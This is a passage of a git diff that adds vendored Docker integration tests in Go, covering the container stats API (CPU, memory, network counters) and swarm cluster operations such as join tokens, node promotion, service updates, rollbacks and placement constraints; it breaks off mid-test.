TestAPIStatsNoStreamGetCpu(c *check.C) { + out, _ := dockerCmd(c, "run", "-d", "busybox", "/bin/sh", "-c", "while true;do echo 'Hello'; usleep 100000; done") + + id := strings.TrimSpace(out) + c.Assert(waitRun(id), checker.IsNil) + + resp, body, err := sockRequestRaw("GET", fmt.Sprintf("/containers/%s/stats?stream=false", id), nil, "") + c.Assert(err, checker.IsNil) + c.Assert(resp.StatusCode, checker.Equals, http.StatusOK) + c.Assert(resp.Header.Get("Content-Type"), checker.Equals, "application/json") + + var v *types.Stats + err = json.NewDecoder(body).Decode(&v) + c.Assert(err, checker.IsNil) + body.Close() + + var cpuPercent = 0.0 + + if daemonPlatform != "windows" { + cpuDelta := float64(v.CPUStats.CPUUsage.TotalUsage - v.PreCPUStats.CPUUsage.TotalUsage) + systemDelta := float64(v.CPUStats.SystemUsage - v.PreCPUStats.SystemUsage) + cpuPercent = (cpuDelta / systemDelta) * float64(len(v.CPUStats.CPUUsage.PercpuUsage)) * 100.0 + } else { + // Max number of 100ns intervals between the previous time read and now + possIntervals := uint64(v.Read.Sub(v.PreRead).Nanoseconds()) // Start with number of ns intervals + possIntervals /= 100 // Convert to number of 100ns intervals + possIntervals *= uint64(v.NumProcs) // Multiple by the number of processors + + // Intervals used + intervalsUsed := v.CPUStats.CPUUsage.TotalUsage - v.PreCPUStats.CPUUsage.TotalUsage + + // Percentage avoiding divide-by-zero + if possIntervals > 0 { + cpuPercent = float64(intervalsUsed) / float64(possIntervals) * 100.0 + } + } + + c.Assert(cpuPercent, check.Not(checker.Equals), 0.0, check.Commentf("docker stats with no-stream get cpu usage failed: was %v", cpuPercent)) +} + +func (s *DockerSuite) TestAPIStatsStoppedContainerInGoroutines(c *check.C) { + out, _ := dockerCmd(c, "run", "-d", "busybox", "/bin/sh", "-c", "echo 1") + id := strings.TrimSpace(out) + + getGoRoutines := func() int { + _, body, err := sockRequestRaw("GET", fmt.Sprintf("/info"), nil, "") + c.Assert(err, checker.IsNil) + info := types.Info{} + err = json.NewDecoder(body).Decode(&info) + c.Assert(err, checker.IsNil) + body.Close() + return info.NGoroutines + } + + // When the HTTP connection is closed, the number of goroutines should not increase. + routines := getGoRoutines() + _, body, err := sockRequestRaw("GET", fmt.Sprintf("/containers/%s/stats", id), nil, "") + c.Assert(err, checker.IsNil) + body.Close() + + t := time.After(30 * time.Second) + for { + select { + case <-t: + c.Assert(getGoRoutines(), checker.LessOrEqualThan, routines) + return + default: + if n := getGoRoutines(); n <= routines { + return + } + time.Sleep(200 * time.Millisecond) + } + } +} + +func (s *DockerSuite) TestAPIStatsNetworkStats(c *check.C) { + testRequires(c, SameHostDaemon) + + out, _ := runSleepingContainer(c) + id := strings.TrimSpace(out) + c.Assert(waitRun(id), checker.IsNil) + + // Retrieve the container address + net := "bridge" + if daemonPlatform == "windows" { + net = "nat" + } + contIP := findContainerIP(c, id, net) + numPings := 1 + + var preRxPackets uint64 + var preTxPackets uint64 + var postRxPackets uint64 + var postTxPackets uint64 + + // Get the container networking stats before and after pinging the container + nwStatsPre := getNetworkStats(c, id) + for _, v := range nwStatsPre { + preRxPackets += v.RxPackets + preTxPackets += v.TxPackets + } + + countParam := "-c" + if runtime.GOOS == "windows" { + countParam = "-n" // Ping count parameter is -n on Windows + } + pingout, err := exec.Command("ping", contIP, countParam, strconv.Itoa(numPings)).CombinedOutput() + if err != nil && runtime.GOOS == "linux" { + // If it fails then try a work-around, but just for linux. + // If this fails too then go back to the old error for reporting. + // + // The ping will sometimes fail due to an apparmor issue where it + // denies access to the libc.so.6 shared library - running it + // via /lib64/ld-linux-x86-64.so.2 seems to work around it. + pingout2, err2 := exec.Command("/lib64/ld-linux-x86-64.so.2", "/bin/ping", contIP, "-c", strconv.Itoa(numPings)).CombinedOutput() + if err2 == nil { + pingout = pingout2 + err = err2 + } + } + c.Assert(err, checker.IsNil) + pingouts := string(pingout[:]) + nwStatsPost := getNetworkStats(c, id) + for _, v := range nwStatsPost { + postRxPackets += v.RxPackets + postTxPackets += v.TxPackets + } + + // Verify the stats contain at least the expected number of packets + // On Linux, account for ARP. + expRxPkts := preRxPackets + uint64(numPings) + expTxPkts := preTxPackets + uint64(numPings) + if daemonPlatform != "windows" { + expRxPkts++ + expTxPkts++ + } + c.Assert(postTxPackets, checker.GreaterOrEqualThan, expTxPkts, + check.Commentf("Reported less TxPackets than expected. Expected >= %d. Found %d. %s", expTxPkts, postTxPackets, pingouts)) + c.Assert(postRxPackets, checker.GreaterOrEqualThan, expRxPkts, + check.Commentf("Reported less Txbytes than expected. Expected >= %d. Found %d. %s", expRxPkts, postRxPackets, pingouts)) +} + +func (s *DockerSuite) TestAPIStatsNetworkStatsVersioning(c *check.C) { + // Windows doesn't support API versions less than 1.25, so no point testing 1.17 .. 1.21 + testRequires(c, SameHostDaemon, DaemonIsLinux) + + out, _ := runSleepingContainer(c) + id := strings.TrimSpace(out) + c.Assert(waitRun(id), checker.IsNil) + wg := sync.WaitGroup{} + + for i := 17; i <= 21; i++ { + wg.Add(1) + go func(i int) { + defer wg.Done() + apiVersion := fmt.Sprintf("v1.%d", i) + statsJSONBlob := getVersionedStats(c, id, apiVersion) + if versions.LessThan(apiVersion, "v1.21") { + c.Assert(jsonBlobHasLTv121NetworkStats(statsJSONBlob), checker.Equals, true, + check.Commentf("Stats JSON blob from API %s %#v does not look like a =v1.21 API stats structure", apiVersion, statsJSONBlob)) + } + }(i) + } + wg.Wait() +} + +func getNetworkStats(c *check.C, id string) map[string]types.NetworkStats { + var st *types.StatsJSON + + _, body, err := sockRequestRaw("GET", fmt.Sprintf("/containers/%s/stats?stream=false", id), nil, "") + c.Assert(err, checker.IsNil) + + err = json.NewDecoder(body).Decode(&st) + c.Assert(err, checker.IsNil) + body.Close() + + return st.Networks +} + +// getVersionedStats returns stats result for the +// container with id using an API call with version apiVersion. Since the +// stats result type differs between API versions, we simply return +// map[string]interface{}. +func getVersionedStats(c *check.C, id string, apiVersion string) map[string]interface{} { + stats := make(map[string]interface{}) + + _, body, err := sockRequestRaw("GET", fmt.Sprintf("/%s/containers/%s/stats?stream=false", apiVersion, id), nil, "") + c.Assert(err, checker.IsNil) + defer body.Close() + + err = json.NewDecoder(body).Decode(&stats) + c.Assert(err, checker.IsNil, check.Commentf("failed to decode stat: %s", err)) + + return stats +} + +func jsonBlobHasLTv121NetworkStats(blob map[string]interface{}) bool { + networkStatsIntfc, ok := blob["network"] + if !ok { + return false + } + networkStats, ok := networkStatsIntfc.(map[string]interface{}) + if !ok { + return false + } + for _, expectedKey := range expectedNetworkInterfaceStats { + if _, ok := networkStats[expectedKey]; !ok { + return false + } + } + return true +} + +func jsonBlobHasGTE121NetworkStats(blob map[string]interface{}) bool { + networksStatsIntfc, ok := blob["networks"] + if !ok { + return false + } + networksStats, ok := networksStatsIntfc.(map[string]interface{}) + if !ok { + return false + } + for _, networkInterfaceStatsIntfc := range networksStats { + networkInterfaceStats, ok := networkInterfaceStatsIntfc.(map[string]interface{}) + if !ok { + return false + } + for _, expectedKey := range expectedNetworkInterfaceStats { + if _, ok := networkInterfaceStats[expectedKey]; !ok { + return false + } + } + } + return true +} + +func (s *DockerSuite) TestAPIStatsContainerNotFound(c *check.C) { + testRequires(c, DaemonIsLinux) + + status, _, err := sockRequest("GET", "/containers/nonexistent/stats", nil) + c.Assert(err, checker.IsNil) + c.Assert(status, checker.Equals, http.StatusNotFound) + + status, _, err = sockRequest("GET", "/containers/nonexistent/stats?stream=0", nil) + c.Assert(err, checker.IsNil) + c.Assert(status, checker.Equals, http.StatusNotFound) +} + +func (s *DockerSuite) TestAPIStatsNoStreamConnectedContainers(c *check.C) { + testRequires(c, DaemonIsLinux) + + out1, _ := runSleepingContainer(c) + id1 := strings.TrimSpace(out1) + c.Assert(waitRun(id1), checker.IsNil) + + out2, _ := runSleepingContainer(c, "--net", "container:"+id1) + id2 := strings.TrimSpace(out2) + c.Assert(waitRun(id2), checker.IsNil) + + ch := make(chan error) + go func() { + resp, body, err := sockRequestRaw("GET", fmt.Sprintf("/containers/%s/stats?stream=false", id2), nil, "") + defer body.Close() + if err != nil { + ch <- err + } + if resp.StatusCode != http.StatusOK { + ch <- fmt.Errorf("Invalid StatusCode %v", resp.StatusCode) + } + if resp.Header.Get("Content-Type") != "application/json" { + ch <- fmt.Errorf("Invalid 'Content-Type' %v", resp.Header.Get("Content-Type")) + } + var v *types.Stats + if err := json.NewDecoder(body).Decode(&v); err != nil { + ch <- err + } + ch <- nil + }() + + select { + case err := <-ch: + c.Assert(err, checker.IsNil, check.Commentf("Error in stats Engine API: %v", err)) + case <-time.After(15 * time.Second): + c.Fatalf("Stats did not return after timeout") + } +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_api_stats_unix_test.go b/vendor/github.com/docker/docker/integration-cli/docker_api_stats_unix_test.go new file mode 100644 index 0000000000..0995ce3833 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_api_stats_unix_test.go @@ -0,0 +1,41 @@ +// +build !windows + +package main + +import ( + "encoding/json" + "fmt" + "net/http" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/pkg/integration/checker" + "github.com/go-check/check" +) + +func (s *DockerSuite) TestAPIStatsContainerGetMemoryLimit(c *check.C) { + testRequires(c, DaemonIsLinux, memoryLimitSupport) + + resp, body, err := sockRequestRaw("GET", "/info", nil, "application/json") + c.Assert(err, checker.IsNil) + c.Assert(resp.StatusCode, checker.Equals, http.StatusOK) + var info types.Info + err = json.NewDecoder(body).Decode(&info) + c.Assert(err, checker.IsNil) + body.Close() + + // don't set a memory limit, the memory limit should be system memory + conName := "foo" + dockerCmd(c, "run", "-d", "--name", conName, "busybox", "top") + c.Assert(waitRun(conName), checker.IsNil) + + resp, body, err = sockRequestRaw("GET", fmt.Sprintf("/containers/%s/stats?stream=false", conName), nil, "") + c.Assert(err, checker.IsNil) + c.Assert(resp.StatusCode, checker.Equals, http.StatusOK) + c.Assert(resp.Header.Get("Content-Type"), checker.Equals, "application/json") + + var v *types.Stats + err = json.NewDecoder(body).Decode(&v) + c.Assert(err, checker.IsNil) + body.Close() + c.Assert(fmt.Sprintf("%d", v.MemoryStats.Limit), checker.Equals, fmt.Sprintf("%d", info.MemTotal)) +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_api_swarm_test.go b/vendor/github.com/docker/docker/integration-cli/docker_api_swarm_test.go new file mode 100644 index 0000000000..1f8eaec6de --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_api_swarm_test.go @@ -0,0 +1,1367 @@ +// +build !windows + +package main + +import ( + "encoding/json" + "fmt" + "net/http" + "os" + "path/filepath" + "strconv" + "strings" + "sync" + "syscall" + "time" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/swarm" + "github.com/docker/docker/pkg/integration/checker" + "github.com/go-check/check" +) + +var defaultReconciliationTimeout = 30 * time.Second + +func (s *DockerSwarmSuite) TestAPISwarmInit(c *check.C) { + // todo: should find a better way to verify that components are running than /info + d1 := s.AddDaemon(c, true, true) + info, err := d1.info() + c.Assert(err, checker.IsNil) + c.Assert(info.ControlAvailable, checker.True) + c.Assert(info.LocalNodeState, checker.Equals, swarm.LocalNodeStateActive) + + d2 := s.AddDaemon(c, true, false) + info, err = d2.info() + c.Assert(err, checker.IsNil) + c.Assert(info.ControlAvailable, checker.False) + c.Assert(info.LocalNodeState, checker.Equals, swarm.LocalNodeStateActive) + + // Leaving cluster + c.Assert(d2.Leave(false), checker.IsNil) + + info, err = d2.info() + c.Assert(err, checker.IsNil) + c.Assert(info.ControlAvailable, checker.False) + c.Assert(info.LocalNodeState, checker.Equals, swarm.LocalNodeStateInactive) + + c.Assert(d2.Join(swarm.JoinRequest{JoinToken: d1.joinTokens(c).Worker, RemoteAddrs: []string{d1.listenAddr}}), checker.IsNil) + + info, err = d2.info() + c.Assert(err, checker.IsNil) + c.Assert(info.ControlAvailable, checker.False) + c.Assert(info.LocalNodeState, checker.Equals, swarm.LocalNodeStateActive) + + // Current state restoring after restarts + err = d1.Stop() + c.Assert(err, checker.IsNil) + err = d2.Stop() + c.Assert(err, checker.IsNil) + + err = d1.Start() + c.Assert(err, checker.IsNil) + err = d2.Start() + c.Assert(err, checker.IsNil) + + info, err = d1.info() + c.Assert(err, checker.IsNil) + c.Assert(info.ControlAvailable, checker.True) + c.Assert(info.LocalNodeState, checker.Equals, swarm.LocalNodeStateActive) + + info, err = d2.info() + c.Assert(err, checker.IsNil) + c.Assert(info.ControlAvailable, checker.False) + c.Assert(info.LocalNodeState, checker.Equals, swarm.LocalNodeStateActive) +} + +func (s *DockerSwarmSuite) TestAPISwarmJoinToken(c *check.C) { + d1 := s.AddDaemon(c, false, false) + c.Assert(d1.Init(swarm.InitRequest{}), checker.IsNil) + + d2 := s.AddDaemon(c, false, false) + err := d2.Join(swarm.JoinRequest{RemoteAddrs: []string{d1.listenAddr}}) + c.Assert(err, checker.NotNil) + c.Assert(err.Error(), checker.Contains, "join token is necessary") + info, err := d2.info() + c.Assert(err, checker.IsNil) + c.Assert(info.LocalNodeState, checker.Equals, swarm.LocalNodeStateInactive) + + err = d2.Join(swarm.JoinRequest{JoinToken: "foobaz", RemoteAddrs: []string{d1.listenAddr}}) + c.Assert(err, checker.NotNil) + c.Assert(err.Error(), checker.Contains, "join token is necessary") + info, err = d2.info() + c.Assert(err, checker.IsNil) + c.Assert(info.LocalNodeState, checker.Equals, swarm.LocalNodeStateInactive) + + workerToken := d1.joinTokens(c).Worker + + c.Assert(d2.Join(swarm.JoinRequest{JoinToken: workerToken, RemoteAddrs: []string{d1.listenAddr}}), checker.IsNil) + info, err = d2.info() + c.Assert(err, checker.IsNil) + c.Assert(info.LocalNodeState, checker.Equals, swarm.LocalNodeStateActive) + c.Assert(d2.Leave(false), checker.IsNil) + info, err = d2.info() + c.Assert(err, checker.IsNil) + c.Assert(info.LocalNodeState, checker.Equals, swarm.LocalNodeStateInactive) + + // change tokens + d1.rotateTokens(c) + + err = d2.Join(swarm.JoinRequest{JoinToken: workerToken, RemoteAddrs: []string{d1.listenAddr}}) + c.Assert(err, checker.NotNil) + c.Assert(err.Error(), checker.Contains, "join token is necessary") + info, err = d2.info() + c.Assert(err, checker.IsNil) + c.Assert(info.LocalNodeState, checker.Equals, swarm.LocalNodeStateInactive) + + workerToken = d1.joinTokens(c).Worker + + c.Assert(d2.Join(swarm.JoinRequest{JoinToken: workerToken, RemoteAddrs: []string{d1.listenAddr}}), checker.IsNil) + info, err = d2.info() + c.Assert(err, checker.IsNil) + c.Assert(info.LocalNodeState, checker.Equals, swarm.LocalNodeStateActive) + c.Assert(d2.Leave(false), checker.IsNil) + info, err = d2.info() + c.Assert(err, checker.IsNil) + c.Assert(info.LocalNodeState, checker.Equals, swarm.LocalNodeStateInactive) + + // change spec, don't change tokens + d1.updateSwarm(c, func(s *swarm.Spec) {}) + + err = d2.Join(swarm.JoinRequest{RemoteAddrs: []string{d1.listenAddr}}) + c.Assert(err, checker.NotNil) + c.Assert(err.Error(), checker.Contains, "join token is necessary") + info, err = d2.info() + c.Assert(err, checker.IsNil) + c.Assert(info.LocalNodeState, checker.Equals, swarm.LocalNodeStateInactive) + + c.Assert(d2.Join(swarm.JoinRequest{JoinToken: workerToken, RemoteAddrs: []string{d1.listenAddr}}), checker.IsNil) + info, err = d2.info() + c.Assert(err, checker.IsNil) + c.Assert(info.LocalNodeState, checker.Equals, swarm.LocalNodeStateActive) + c.Assert(d2.Leave(false), checker.IsNil) + info, err = d2.info() + c.Assert(err, checker.IsNil) + c.Assert(info.LocalNodeState, checker.Equals, swarm.LocalNodeStateInactive) +} + +func (s *DockerSwarmSuite) TestAPISwarmCAHash(c *check.C) { + d1 := s.AddDaemon(c, true, true) + d2 := s.AddDaemon(c, false, false) + splitToken := strings.Split(d1.joinTokens(c).Worker, "-") + splitToken[2] = "1kxftv4ofnc6mt30lmgipg6ngf9luhwqopfk1tz6bdmnkubg0e" + replacementToken := strings.Join(splitToken, "-") + err := d2.Join(swarm.JoinRequest{JoinToken: replacementToken, RemoteAddrs: []string{d1.listenAddr}}) + c.Assert(err, checker.NotNil) + c.Assert(err.Error(), checker.Contains, "remote CA does not match fingerprint") +} + +func (s *DockerSwarmSuite) TestAPISwarmPromoteDemote(c *check.C) { + d1 := s.AddDaemon(c, false, false) + c.Assert(d1.Init(swarm.InitRequest{}), checker.IsNil) + d2 := s.AddDaemon(c, true, false) + + info, err := d2.info() + c.Assert(err, checker.IsNil) + c.Assert(info.ControlAvailable, checker.False) + c.Assert(info.LocalNodeState, checker.Equals, swarm.LocalNodeStateActive) + + d1.updateNode(c, d2.NodeID, func(n *swarm.Node) { + n.Spec.Role = swarm.NodeRoleManager + }) + + waitAndAssert(c, defaultReconciliationTimeout, d2.checkControlAvailable, checker.True) + + d1.updateNode(c, d2.NodeID, func(n *swarm.Node) { + n.Spec.Role = swarm.NodeRoleWorker + }) + + waitAndAssert(c, defaultReconciliationTimeout, d2.checkControlAvailable, checker.False) + + // Demoting last node should fail + node := d1.getNode(c, d1.NodeID) + node.Spec.Role = swarm.NodeRoleWorker + url := fmt.Sprintf("/nodes/%s/update?version=%d", node.ID, node.Version.Index) + status, out, err := d1.SockRequest("POST", url, node.Spec) + c.Assert(err, checker.IsNil) + c.Assert(status, checker.Equals, http.StatusInternalServerError, check.Commentf("output: %q", string(out))) + c.Assert(string(out), checker.Contains, "last manager of the swarm") + info, err = d1.info() + c.Assert(err, checker.IsNil) + c.Assert(info.LocalNodeState, checker.Equals, swarm.LocalNodeStateActive) + c.Assert(info.ControlAvailable, checker.True) + + // Promote already demoted node + d1.updateNode(c, d2.NodeID, func(n *swarm.Node) { + n.Spec.Role = swarm.NodeRoleManager + }) + + waitAndAssert(c, defaultReconciliationTimeout, d2.checkControlAvailable, checker.True) +} + +func (s *DockerSwarmSuite) TestAPISwarmServicesEmptyList(c *check.C) { + d := s.AddDaemon(c, true, true) + + services := d.listServices(c) + c.Assert(services, checker.NotNil) + c.Assert(len(services), checker.Equals, 0, check.Commentf("services: %#v", services)) +} + +func (s *DockerSwarmSuite) TestAPISwarmServicesCreate(c *check.C) { + d := s.AddDaemon(c, true, true) + + instances := 2 + id := d.createService(c, simpleTestService, setInstances(instances)) + waitAndAssert(c, defaultReconciliationTimeout, d.checkActiveContainerCount, checker.Equals, instances) + + service := d.getService(c, id) + instances = 5 + d.updateService(c, service, setInstances(instances)) + waitAndAssert(c, defaultReconciliationTimeout, d.checkActiveContainerCount, checker.Equals, instances) + + d.removeService(c, service.ID) + waitAndAssert(c, defaultReconciliationTimeout, d.checkActiveContainerCount, checker.Equals, 0) +} + +func (s *DockerSwarmSuite) TestAPISwarmServicesMultipleAgents(c *check.C) { + d1 := s.AddDaemon(c, true, true) + d2 := s.AddDaemon(c, true, false) + d3 := s.AddDaemon(c, true, false) + + time.Sleep(1 * time.Second) // make sure all daemons are ready to accept tasks + + instances := 9 + id := d1.createService(c, simpleTestService, setInstances(instances)) + + waitAndAssert(c, defaultReconciliationTimeout, d1.checkActiveContainerCount, checker.GreaterThan, 0) + waitAndAssert(c, defaultReconciliationTimeout, d2.checkActiveContainerCount, checker.GreaterThan, 0) + waitAndAssert(c, defaultReconciliationTimeout, d3.checkActiveContainerCount, checker.GreaterThan, 0) + + waitAndAssert(c, defaultReconciliationTimeout, reducedCheck(sumAsIntegers, d1.checkActiveContainerCount, d2.checkActiveContainerCount, d3.checkActiveContainerCount), checker.Equals, instances) + + // reconciliation on d2 node down + c.Assert(d2.Stop(), checker.IsNil) + + waitAndAssert(c, defaultReconciliationTimeout, reducedCheck(sumAsIntegers, d1.checkActiveContainerCount, d3.checkActiveContainerCount), checker.Equals, instances) + + // test downscaling + instances = 5 + d1.updateService(c, d1.getService(c, id), setInstances(instances)) + waitAndAssert(c, defaultReconciliationTimeout, reducedCheck(sumAsIntegers, d1.checkActiveContainerCount, d3.checkActiveContainerCount), checker.Equals, instances) + +} + +func (s *DockerSwarmSuite) TestAPISwarmServicesCreateGlobal(c *check.C) { + d1 := s.AddDaemon(c, true, true) + d2 := s.AddDaemon(c, true, false) + d3 := s.AddDaemon(c, true, false) + + d1.createService(c, simpleTestService, setGlobalMode) + + waitAndAssert(c, defaultReconciliationTimeout, d1.checkActiveContainerCount, checker.Equals, 1) + waitAndAssert(c, defaultReconciliationTimeout, d2.checkActiveContainerCount, checker.Equals, 1) + waitAndAssert(c, defaultReconciliationTimeout, d3.checkActiveContainerCount, checker.Equals, 1) + + d4 := s.AddDaemon(c, true, false) + d5 := s.AddDaemon(c, true, false) + + waitAndAssert(c, defaultReconciliationTimeout, d4.checkActiveContainerCount, checker.Equals, 1) + waitAndAssert(c, defaultReconciliationTimeout, d5.checkActiveContainerCount, checker.Equals, 1) +} + +func (s *DockerSwarmSuite) TestAPISwarmServicesUpdate(c *check.C) { + const nodeCount = 3 + var daemons [nodeCount]*SwarmDaemon + for i := 0; i < nodeCount; i++ { + daemons[i] = s.AddDaemon(c, true, i == 0) + } + // wait for nodes ready + waitAndAssert(c, 5*time.Second, daemons[0].checkNodeReadyCount, checker.Equals, nodeCount) + + // service image at start + image1 := "busybox:latest" + // target image in update + image2 := "busybox:test" + + // create a different tag + for _, d := range daemons { + out, err := d.Cmd("tag", image1, image2) + c.Assert(err, checker.IsNil, check.Commentf(out)) + } + + // create service + instances := 5 + parallelism := 2 + id := daemons[0].createService(c, serviceForUpdate, setInstances(instances)) + + // wait for tasks ready + waitAndAssert(c, defaultReconciliationTimeout, daemons[0].checkRunningTaskImages, checker.DeepEquals, + map[string]int{image1: instances}) + + // issue service update + service := daemons[0].getService(c, id) + daemons[0].updateService(c, service, setImage(image2)) + + // first batch + waitAndAssert(c, defaultReconciliationTimeout, daemons[0].checkRunningTaskImages, checker.DeepEquals, + map[string]int{image1: instances - parallelism, image2: parallelism}) + + // 2nd batch + waitAndAssert(c, defaultReconciliationTimeout, daemons[0].checkRunningTaskImages, checker.DeepEquals, + map[string]int{image1: instances - 2*parallelism, image2: 2 * parallelism}) + + // 3nd batch + waitAndAssert(c, defaultReconciliationTimeout, daemons[0].checkRunningTaskImages, checker.DeepEquals, + map[string]int{image2: instances}) + + // Roll back to the previous version. This uses the CLI because + // rollback is a client-side operation. + out, err := daemons[0].Cmd("service", "update", "--rollback", id) + c.Assert(err, checker.IsNil, check.Commentf(out)) + + // first batch + waitAndAssert(c, defaultReconciliationTimeout, daemons[0].checkRunningTaskImages, checker.DeepEquals, + map[string]int{image2: instances - parallelism, image1: parallelism}) + + // 2nd batch + waitAndAssert(c, defaultReconciliationTimeout, daemons[0].checkRunningTaskImages, checker.DeepEquals, + map[string]int{image2: instances - 2*parallelism, image1: 2 * parallelism}) + + // 3nd batch + waitAndAssert(c, defaultReconciliationTimeout, daemons[0].checkRunningTaskImages, checker.DeepEquals, + map[string]int{image1: instances}) +} + +func (s *DockerSwarmSuite) TestAPISwarmServicesFailedUpdate(c *check.C) { + const nodeCount = 3 + var daemons [nodeCount]*SwarmDaemon + for i := 0; i < nodeCount; i++ { + daemons[i] = s.AddDaemon(c, true, i == 0) + } + // wait for nodes ready + waitAndAssert(c, 5*time.Second, daemons[0].checkNodeReadyCount, checker.Equals, nodeCount) + + // service image at start + image1 := "busybox:latest" + // target image in update + image2 := "busybox:badtag" + + // create service + instances := 5 + id := daemons[0].createService(c, serviceForUpdate, setInstances(instances)) + + // wait for tasks ready + waitAndAssert(c, defaultReconciliationTimeout, daemons[0].checkRunningTaskImages, checker.DeepEquals, + map[string]int{image1: instances}) + + // issue service update + service := daemons[0].getService(c, id) + daemons[0].updateService(c, service, setImage(image2), setFailureAction(swarm.UpdateFailureActionPause), setMaxFailureRatio(0.25), setParallelism(1)) + + // should update 2 tasks and then pause + waitAndAssert(c, defaultReconciliationTimeout, daemons[0].checkServiceUpdateState(id), checker.Equals, swarm.UpdateStatePaused) + v, _ := daemons[0].checkServiceRunningTasks(id)(c) + c.Assert(v, checker.Equals, instances-2) + + // Roll back to the previous version. This uses the CLI because + // rollback is a client-side operation. + out, err := daemons[0].Cmd("service", "update", "--rollback", id) + c.Assert(err, checker.IsNil, check.Commentf(out)) + + waitAndAssert(c, defaultReconciliationTimeout, daemons[0].checkRunningTaskImages, checker.DeepEquals, + map[string]int{image1: instances}) +} + +func (s *DockerSwarmSuite) TestAPISwarmServiceConstraintRole(c *check.C) { + const nodeCount = 3 + var daemons [nodeCount]*SwarmDaemon + for i := 0; i < nodeCount; i++ { + daemons[i] = s.AddDaemon(c, true, i == 0) + } + // wait for nodes ready + waitAndAssert(c, 5*time.Second, daemons[0].checkNodeReadyCount, checker.Equals, nodeCount) + + // create service + constraints := []string{"node.role==worker"} + instances := 3 + id := daemons[0].createService(c, simpleTestService, setConstraints(constraints), setInstances(instances)) + // wait for tasks ready + waitAndAssert(c, defaultReconciliationTimeout, daemons[0].checkServiceRunningTasks(id), checker.Equals, instances) + // validate tasks are running on worker nodes + tasks := daemons[0].getServiceTasks(c, id) + for _, task := range tasks { + node := daemons[0].getNode(c, task.NodeID) + c.Assert(node.Spec.Role, checker.Equals, swarm.NodeRoleWorker) + } + //remove service + daemons[0].removeService(c, id) + + // create service + constraints = []string{"node.role!=worker"} + id = daemons[0].createService(c, simpleTestService, setConstraints(constraints), setInstances(instances)) + // wait for tasks ready + waitAndAssert(c, defaultReconciliationTimeout, daemons[0].checkServiceRunningTasks(id), checker.Equals, instances) + tasks = daemons[0].getServiceTasks(c, id) + // validate tasks are running on manager nodes + for _, task := range tasks { + node := daemons[0].getNode(c, task.NodeID) + c.Assert(node.Spec.Role, checker.Equals, swarm.NodeRoleManager) + } + //remove service + daemons[0].removeService(c, id) + + // create service + constraints = []string{"node.role==nosuchrole"} + id = daemons[0].createService(c, simpleTestService, setConstraints(constraints), setInstances(instances)) + // wait for tasks created + waitAndAssert(c, defaultReconciliationTimeout, daemons[0].checkServiceTasks(id), checker.Equals, instances) + // let scheduler try + time.Sleep(250 * time.Millisecond) + // validate tasks are not assigned to any node + tasks = daemons[0].getServiceTasks(c, id) + for _, task := range tasks { + c.Assert(task.NodeID, checker.Equals, "") + } +} + +func (s *DockerSwarmSuite) TestAPISwarmServiceConstraintLabel(c *check.C) { + const nodeCount = 3 + var daemons [nodeCount]*SwarmDaemon + for i := 0; i < nodeCount; i++ { + daemons[i] = s.AddDaemon(c, true, i == 0) + } + // wait for nodes ready + waitAndAssert(c, 5*time.Second, daemons[0].checkNodeReadyCount, checker.Equals, nodeCount) + nodes := daemons[0].listNodes(c) + c.Assert(len(nodes), checker.Equals, nodeCount) + + // add labels to nodes + daemons[0].updateNode(c, nodes[0].ID, func(n *swarm.Node) { + n.Spec.Annotations.Labels = map[string]string{ + "security": "high", + } + }) + for i := 1; i < nodeCount; i++ { + daemons[0].updateNode(c, nodes[i].ID, func(n *swarm.Node) { + n.Spec.Annotations.Labels = map[string]string{ + "security": "low", + } + }) + } + + // create service + instances := 3 + constraints := []string{"node.labels.security==high"} + id := daemons[0].createService(c, simpleTestService, setConstraints(constraints), setInstances(instances)) + // wait for tasks ready + waitAndAssert(c, defaultReconciliationTimeout, daemons[0].checkServiceRunningTasks(id), checker.Equals, instances) + tasks := daemons[0].getServiceTasks(c, id) + // validate all tasks are running on nodes[0] + for _, task := range tasks { + c.Assert(task.NodeID, checker.Equals, nodes[0].ID) + } + //remove service + daemons[0].removeService(c, id) + + // create service + constraints = []string{"node.labels.security!=high"} + id = daemons[0].createService(c, simpleTestService, setConstraints(constraints), setInstances(instances)) + // wait for tasks ready + waitAndAssert(c, defaultReconciliationTimeout, daemons[0].checkServiceRunningTasks(id), checker.Equals, instances) + tasks = daemons[0].getServiceTasks(c, id) + // validate all tasks are NOT running on nodes[0] + for _, task := range tasks { + c.Assert(task.NodeID, checker.Not(checker.Equals), nodes[0].ID) + } + //remove service + daemons[0].removeService(c, id) + + constraints = []string{"node.labels.security==medium"} + id = daemons[0].createService(c, simpleTestService, setConstraints(constraints), setInstances(instances)) + // wait for tasks created + waitAndAssert(c, defaultReconciliationTimeout, daemons[0].checkServiceTasks(id), checker.Equals, instances) + // let scheduler try + time.Sleep(250 * time.Millisecond) + tasks = daemons[0].getServiceTasks(c, id) + // validate tasks are not assigned + for _, task := range tasks { + c.Assert(task.NodeID, checker.Equals, "") + } + //remove service + daemons[0].removeService(c, id) + + // multiple constraints + constraints = []string{ + "node.labels.security==high", + fmt.Sprintf("node.id==%s", nodes[1].ID), + } + id = daemons[0].createService(c, simpleTestService, setConstraints(constraints), setInstances(instances)) + // wait for tasks created + waitAndAssert(c, defaultReconciliationTimeout, daemons[0].checkServiceTasks(id), checker.Equals, instances) + // let scheduler try + time.Sleep(250 * time.Millisecond) + tasks = daemons[0].getServiceTasks(c, id) + // validate tasks are not assigned + for _, task := range tasks { + c.Assert(task.NodeID, checker.Equals, "") + } + // make nodes[1] fulfills the constraints + daemons[0].updateNode(c, nodes[1].ID, func(n *swarm.Node) { + n.Spec.Annotations.Labels = map[string]string{ + "security": "high", + } + }) + // wait for tasks ready + waitAndAssert(c, defaultReconciliationTimeout, daemons[0].checkServiceRunningTasks(id), checker.Equals, instances) + tasks = daemons[0].getServiceTasks(c, id) + for _, task := range tasks { + c.Assert(task.NodeID, checker.Equals, nodes[1].ID) + } +} + +func (s *DockerSwarmSuite) TestAPISwarmServicesStateReporting(c *check.C) { + testRequires(c, SameHostDaemon) + testRequires(c, DaemonIsLinux) + + d1 := s.AddDaemon(c, true, true) + d2 := s.AddDaemon(c, true, true) + d3 := s.AddDaemon(c, true, false) + + time.Sleep(1 * time.Second) // make sure all daemons are ready to accept + + instances := 9 + d1.createService(c, simpleTestService, setInstances(instances)) + + waitAndAssert(c, 